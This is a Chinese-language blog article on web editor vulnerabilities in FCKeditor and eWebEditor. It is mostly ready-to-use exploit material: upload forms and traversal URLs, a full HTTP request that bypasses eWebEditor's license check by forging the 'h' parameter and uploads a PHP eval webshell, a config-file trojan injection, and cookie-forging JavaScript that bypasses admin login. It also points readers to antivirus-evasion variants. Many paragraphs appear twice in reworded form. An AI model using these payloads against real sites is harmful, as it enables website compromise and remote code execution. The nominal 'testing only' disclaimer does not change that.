导读:随着互联网在中国的兴起，网站发展迅速。从最初的企业网站到个人网站，从最初的静态网站到数据交互的动态网站，WEB安全引起了人们的不断关注。在WEB安全中，前端编辑器是安全的重点，因为编辑器包含了文字、图片、附件等上传功能。如果过滤不慎，相当于放弃了整个网站权限。

从动态WEB发展初期到现在，编辑器漏洞一直在不断出现。君先列举一些最著名的编辑器漏洞，看看它们的漏洞程度。

FCKeditor

大家都知道FCKeditor是WEB开发的童鞋。FCK是这个编辑器的作者Frederico Caldeira Knabben的缩写，是一个所见即所得的文本编辑器，属于开源代码，专门用在网页上。它致力于轻量级，无需太复杂的安装步骤即可使用。可以和PHP、JavaScript、ASP、ASP.NET、ColdFusion、Java、ABAP等不同的编程语言结合使用。，而且使用率极高。

它的漏洞也存在于每个版本中。现在我们来列举其中的一些。

FCKeditor可以通过FCKeditor/_ whatsnew.html查看当前版本。如果版本是2.2，在Apache+linux环境下上传的文件后面加一个.来绕过文件验证，上传WEBSHELL。

PHP的FCK版本

<form id="frmUpload" enctype="multipart/form-data"action="http://***.itgeeker.cn/FCKeditor/editor/file***nager/upload/php/upload.php?Type=Media"method="post">漏洞测试上传任意文件:<br><input type="file" name="NewFile" size="50"><br><input id="btnUpload" type="submit" value="Upload"></form>

Fc version =4.1版本提交到WEBSHELL.php+空可以绕过对其后缀的检测。

FCK版本=版本4.2。如果你继续上传同名文件，它会变成WEBSHELL.php。(1).jpg，执行WEBSHELL。

突破文件夹漏洞，利用解析漏洞，并测试代码:

FCKeditor/editor/file***nager/connectors/php/connector.php?Com***nd=CreateFolder&Type=I***ge&CurrentFolder=%2FWEBSHELL.php&NewFolderName=z&uuid=1254789325665FCKeditor/editor/file***nager/browser/default/connectors/php/connector.php?Com***nd=CreateFolder&CurrentFolder=/&Type=I***ge&NewFolderName=WEBSHELL.php

列目录漏洞:

1.修改CurrentFolder参数并使用../../输入不同的目录。

/browser/default/connectors/aspx/connector.aspx?Com***nd=CreateFolder&Type=I***ge&CurrentFolder=../../..%2F&NewFolderName=shell.asp

2。通过返回的XML信息查看所有目录。

FCKeditor/editor/file***nager/browser/default/connectors/aspx/connector.aspx?Com***nd=GetFoldersAndFiles&Type=I***ge&CurrentFolder=%2F

像FCKeditor这样有漏洞的编辑器还有很多，比如eWebEditor，CKFinder，南方数据编辑器southidceditor，UEDITOR，DotNetTextBox编辑器，PHPWEB网站管理系统后台的Kedit编辑器，Cute编辑器等等。也有同样的用法:上传未过滤，上传过滤后缀绕过，添加新后缀，文件夹解析漏洞

本期我们着重地讲解一下eWebEditor，当我打开它的官方网站时瞬间惊呆了，感觉一下子回到了10年前的感觉，整个网站仍然使用了ASP开发，界面也是10年前的常用布局。

本期，我们重点关注eWebEditor。打开它的官网，我瞬间惊呆了，感觉就像10年前一样。整个网站还是用ASP开发的，界面也是10年前常见的布局。

电子编辑主页

官方介绍:eWEBEditor是一款基于浏览器的在线HTML编辑器。Web开发人员可以使用它将传统的多行文本输入到

您可以完全通过eWebEditor自己的可视化配置工具来配置它。

eWebEditor非常容易与你现有的系统集成，简单到你只需要一行代码就可以完成对EWebEditor的调用。

您可以将eWebEditor应用于各种基于web的应用系统，如内容管理系统、邮件系统、论坛系统、新闻发布系统等。所有与内容发布相关的应用系统。

编辑器界面

看到这个界面是不是特别的熟悉，目前市场上的大多数CMS仍然使用eWebEditor。

这个界面是不是特别熟悉？目前市面上大部分CMS还是用eWebEditor。

授权背景

目前eWebEditor开始授权使用，购买授权之后可以通过其后台进行修改后缀等，也就形成了上传WEBSHELL的通道，而目前非常多的使用者并未进行授权，那么如何获取WEBSHELL呢？

目前，eWebEditor已经开始授权使用。购买授权后，可以通过其后台修改后缀等。，从而形成上传WEBSHELL的渠道。目前很多用户还没有授权，那么如何获取WEBSHELL呢？

未经授权的背景

未授权的eWebEditor在样式管理和上传管理中不可用，所以之前的漏洞是不可用的。那么如何才能绕开呢？看君的示范:

eWebEditor为了方便开发者在本地进行测试，并未对127.0.0.1或localhost进行必要授权使用，也就是说如果你使用域名访问未授权后台，是没有权限进行修改配置，但是如果你使用127.0.0.1或是localhost本地测试则是可以的。

EWebEditor为了方便开发者在本地测试，并没有授权127.0.0.1或localhost。也就是说，如果使用域名访问未经授权的后台，是无权修改配置的，但是如果使用127.0.0.1或者localhost进行本地测试，则可以。

本地测试

本地测试

可以修改本地测试。

现在让我们审计代码，看看它对localhost、127.0.0.1和域名访问有什么不同的影响。

经过我们的查找发现在ewebeditor/php/i.php文件中的CheckLicense函数中，在检查授权信息时，先判断当前域名是否是127.0.0.1或者localhost，如果是的话，就直接返回true，不再进一步验证授权是否有效。

经过我们的查找，发现在ewebeditor/php/i.php文件中的CheckLicense函数中，在检查授权信息时，首先要判断当前域名是127.0.0.1还是localhost，如果是，我们就直接返回true，不需要进一步验证授权是否有效。

代码段

既然知道是这个问题，那我们就试着造假，绕过它，让后台的配置功能可以正常使用。

我们在登录ewebeditor后台时，使用Burp拦截数据，可以看到有个请求参数h的值为当前的域名或IP。

当我们登录到ewebeditor的后台，用Burp截取数据，可以看到有一个请求参数h，它的值是当前的域名或者IP。

数据拦截

我们把这个H值伪造成127.0.0.1，提交测试:

成功进入后台后，虽然显示仍为无效授权，但是后台的配置等功能完全可以使用了。

成功进入后台后，虽然显示仍然是无效授权，后台配置等功能完全可以使用。

后台配置工作正常。

然后我们找到一个样式表进行配置上传后缀的修改，添加一个php后缀，即可上传WEBSHELL。

然后我们找一个样式表修改配置上传后缀，加一个php后缀上传WEBSHELL。

添加后缀

为了测试方便，exp直接发布给大家。请不要非法攻击，只是为了测试！

这段代码已经包含一个单词的特洛伊木马。如果你觉得不能不杀，可以看看君之前的文章，里面有一个免杀的可以用。

POST /htmledit/php/upload.php?action=save&type=i***ge&style=standard650&cusdir=&skey= HTTP/1.1Host: just.for.testContent-Length: 4***Cache-Control: ***x-age=0Upgrade-Insecure-Requests: 1Origin: http://just.for.testContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryq6hGwZDfJoQ7dmXyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win***; x***) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 Edg/86.0.622.51Accept: text/html,application/xhtml+xml,application/xml;q=0.9,i***ge/webp,i***ge/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://just.for.test/htmledit/dialog/img.htmAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection: close------WebKitFormBoundaryq6hGwZDfJoQ7dmXyContent-Disposition: form-data; name="MAX_FILE_SIZE"102400------WebKitFormBoundaryq6hGwZDfJoQ7dmXyContent-Disposition: form-data; name="uploadfile"; filename="php_eval.php"Content-Type: i***ge/jpeg<?php @eval($_POST['password']);?>------WebKitFormBoundaryq6hGwZDfJoQ7dmXyContent-Disposition: form-data; name="originalfile"C:fakepathphp_eval.php------WebKitFormBoundaryq6hGwZDfJoQ7dmXy--

上传成功：

上传成功:

上传成功。

以上是eWebEditor的最新漏洞。现在，我们来盘点一下eWebEditor最热门的漏洞。

数据库下载

ewebeditor db/ewebeditor.mdb的默认数据库路径可以直接下载。如果有后台接口，可以直接破解MD5密码登录。但很多时候，渗透者通过这种方法成功获得权限后，后台登录页面login.php、admin_login.php、login.php都会被删除。然后我们就可以下载数据库，找到之前的渗透者，修改添加后缀，比如asa，asp，aspx，php，cer等。然后通过URL构造editor.html直接上传到eWebEditor。

<form action=”http://***.itgeeker.cn/editor/upload.asp?action=save&type=&style=样式名” method=post name=myformenctype=”multipart/form-data”><input type=file name=uploadfile size=1 style=”width:100%”><input type=submit value=”上传测试”></input></form>

配置文件插入

eWebEditor = & gt2.8商业版后台木马，登录后台，点击修改密码—在新密码设置中填入自己的word木马。成功提交设置后，您可以访问配置文件asp/config.asp文件。一句话，木马就写到这个文件里了。

文件夹遍历漏洞

就像我在本文开头写的FCKeditor编辑器的文件遍历漏洞一样，EweEditor也有这个漏洞。文件夹遍历漏洞基本存在于
eWebEditor/admin _ upload file.asp中。高版本号是
ewebeditor/admin/upload . ASP文件，我们可以构造一个连接:

webeditor/admin_uploadfile.asp?id=14&dir=../../../../

遍历WEB的目录，同样存在遍历漏洞的代码有:

http://***.itgeeker.cn/ewebeditor/asp/browse.asp?style=standard650&dir=…././/…././/admin

后台旁路验证登录

访问后台登录页面！随便输入账号密码，登录错误后返回空浏览器，在地址栏输入。

javascript:alert(document.cookie="adminuser="+escape("admin"));javascript:alert(document.cookie="adminpass="+escape("admin"));javascript:alert(document.cookie="admindj="+escape("1"));

然后清空空地址栏，在路径中输入后台登录后的页面，例如:admin_default.asp、admin/default.asp等。，并且可以直接进入后台。这是一个很老的漏洞，而且只针对你的测试。

结论:

由于编辑器是打通前端和后端数据交互的必备工具之一，所以我们更应该关注它的安全性，而不仅仅是后端的逻辑安全性。感谢您阅读这篇文章。更多安全知识，请关注极客君头条。下次见！